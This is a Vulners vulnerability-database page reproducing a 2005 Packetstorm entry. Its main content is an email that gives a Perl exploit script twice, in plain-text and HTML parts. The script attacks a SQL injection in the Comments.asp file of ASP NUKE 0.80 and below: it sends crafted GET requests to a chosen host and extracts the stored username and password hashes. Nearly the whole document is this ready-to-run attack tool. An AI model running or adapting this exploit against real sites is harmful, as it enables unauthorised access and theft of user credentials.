Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

comasp.pl.txt

🗓️ 01 Jun 2005 00:00:00Reported by Diabolic CrabType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

This is a Perl script for exploiting an SQL Injection vulnerability in ASP NUKE 0.80 and below Comments.asp file

Show more
Code
`This is a multi-part message in MIME format.  
  
------=_NextPart_000_0039_01C5473D.C6C4A380  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
=20  
#!/usr/bin/perl  
  
use IO::Socket;  
use Getopt::Std;  
print "[x]ASP NUKE 0.80 and below Comments.asp Sql Injection Exploit\n";  
print "[x]By Diabolic Crab\n";  
print "[x]http://www.digitalparadox.org\n\n";  
  
getopt("h:p:");  
  
$opt_p ||=3D 80;  
  
if(!$opt_h) {  
die("[x] Usage: $0 -h <host> [-p <port>]\n");  
}  
  
$sqlpass =3D "/module/support/task/comments.asp?taskid=3DPassword-- =  
HTTP/1.0\n";  
$sqllogin =3D "/module/support/task/comments.asp?taskid=3DUsername-- =  
HTTP/1.0\n";  
  
print "[x] Host: $opt_h\n";  
print "[x] Port: $opt_p\n";  
  
$Q1 =3D "GET $sqllogin";  
$Q1 .=3D "Host: ".$opt_h."\n\n";  
  
$Q2 =3D "GET $sqlpass";  
$Q2 .=3D "Host: ".$opt_h."\n\n";  
  
$s =3D IO::Socket::INET->new(Proto =3D> 'tcp', PeerAddr =3D> $opt_h, =  
PeerPort =3D> $opt_p) or die("Can't connect!");  
$s->send($Q1);  
$s->recv($usr, 1024);  
  
$s =3D IO::Socket::INET->new(Proto=3D>'tcp', PeerAddr =3D> $opt_h, =  
PeerPort =3D> $opt_p) or die("Can't connect!");  
$s->send($Q2);  
$s->recv($pass, 1024);  
  
$s =3D index($usr,"'");  
$e =3D index($usr,"'", $s + 1);  
$f =3D $e - $s - 1;  
print "[x]Username in SHA 256 is: ";  
print substr($usr, $s + 1, $f);  
print "\n";  
  
$s =3D index($pass,"'");  
$e =3D index($pass,"'", $s + 1);  
$f =3D $e - $s - 1;  
print "[x]Password hash in SHA 256 is: ";  
print substr($pass, $s + 1, $f);  
print "\n";  
Sincerely,  
Diabolic Crab  
Web Security, Research & Development  
dP Security  
email: [email protected]  
website: http://www.digitalparadox.org=20  
  
This message is confidential. It may also contain information that is=20  
privileged or otherwise legally exempt from disclosure.=20  
If you have received it by mistake please let us know by e-mail=20  
immediately and delete it from your system; should also not copy=20  
the message nor disclose its contents to anyone. Many thanks.  
  
  
------=_NextPart_000_0039_01C5473D.C6C4A380  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2627" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV><FONT face=3DArial size=3D2><!--StartFragment --><FONT =  
face=3D"Times New Roman"=20  
size=3D3>&nbsp;</FONT><PRE>#!/usr/bin/perl  
  
use IO::Socket;  
use Getopt::Std;  
print "[x]ASP NUKE 0.80 and below Comments.asp Sql Injection Exploit\n";  
print "[x]By Diabolic Crab\n";  
print "[x]http://www.digitalparadox.org\n\n";  
  
getopt("h:p:");  
  
$opt_p ||=3D 80;  
  
if(!$opt_h) {  
die("[x] Usage: $0 -h <host> [-p <port>]\n");  
}  
  
$sqlpass =3D "/module/support/task/comments.asp?taskid=3DPassword-- =  
HTTP/1.0\n";  
$sqllogin =3D "/module/support/task/comments.asp?taskid=3DUsername-- =  
HTTP/1.0\n";  
  
print "[x] Host: $opt_h\n";  
print "[x] Port: $opt_p\n";  
  
$Q1 =3D "GET $sqllogin";  
$Q1 .=3D "Host: ".$opt_h."\n\n";  
  
$Q2 =3D "GET $sqlpass";  
$Q2 .=3D "Host: ".$opt_h."\n\n";  
  
$s =3D IO::Socket::INET->new(Proto =3D> 'tcp', PeerAddr =3D> =  
$opt_h, PeerPort =3D> $opt_p) or die("Can't connect!");  
$s->send($Q1);  
$s->recv($usr, 1024);  
  
$s =3D IO::Socket::INET->new(Proto=3D>'tcp', PeerAddr =3D> =  
$opt_h, PeerPort =3D> $opt_p) or die("Can't connect!");  
$s->send($Q2);  
$s->recv($pass, 1024);  
  
$s =3D index($usr,"'");  
$e =3D index($usr,"'", $s + 1);  
$f =3D $e - $s - 1;  
print "[x]Username in SHA 256 is: ";  
print substr($usr, $s + 1, $f);  
print "\n";  
  
$s =3D index($pass,"'");  
$e =3D index($pass,"'", $s + 1);  
$f =3D $e - $s - 1;  
print "[x]Password hash in SHA 256 is: ";  
print substr($pass, $s + 1, $f);  
print "\n";  
</PRE></FONT></DIV>  
<DIV><FONT face=3DArial size=3D2>Sincerely,<BR>Diabolic Crab<BR>Web =  
Security,&nbsp;=20  
Research & Development<BR>dP Security<BR>email: <A=20  
href=3D"mailto:[email protected]">[email protected]</A><BR>=  
website:=20  
<A =  
href=3D"http://www.digitalparadox.org">http://www.digitalparadox.org</A> =  
  
</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>This message is confidential. It may =  
also contain=20  
information that is <BR>privileged or otherwise legally exempt from =  
disclosure.=20  
<BR>If you have received it by mistake please let us know by e-mail=20  
<BR>immediately and delete it from your system; should also not copy =  
<BR>the=20  
message nor disclose its contents to anyone. Many thanks.</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML>  
  
------=_NextPart_000_0039_01C5473D.C6C4A380--  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Jun 2005 00:00Current
7.4High risk
Vulners AI Score7.4
perl scriptsql injectionasp nuke 0.80comments.aspdiabolic crabdigitalparadox.org
18
.json
Report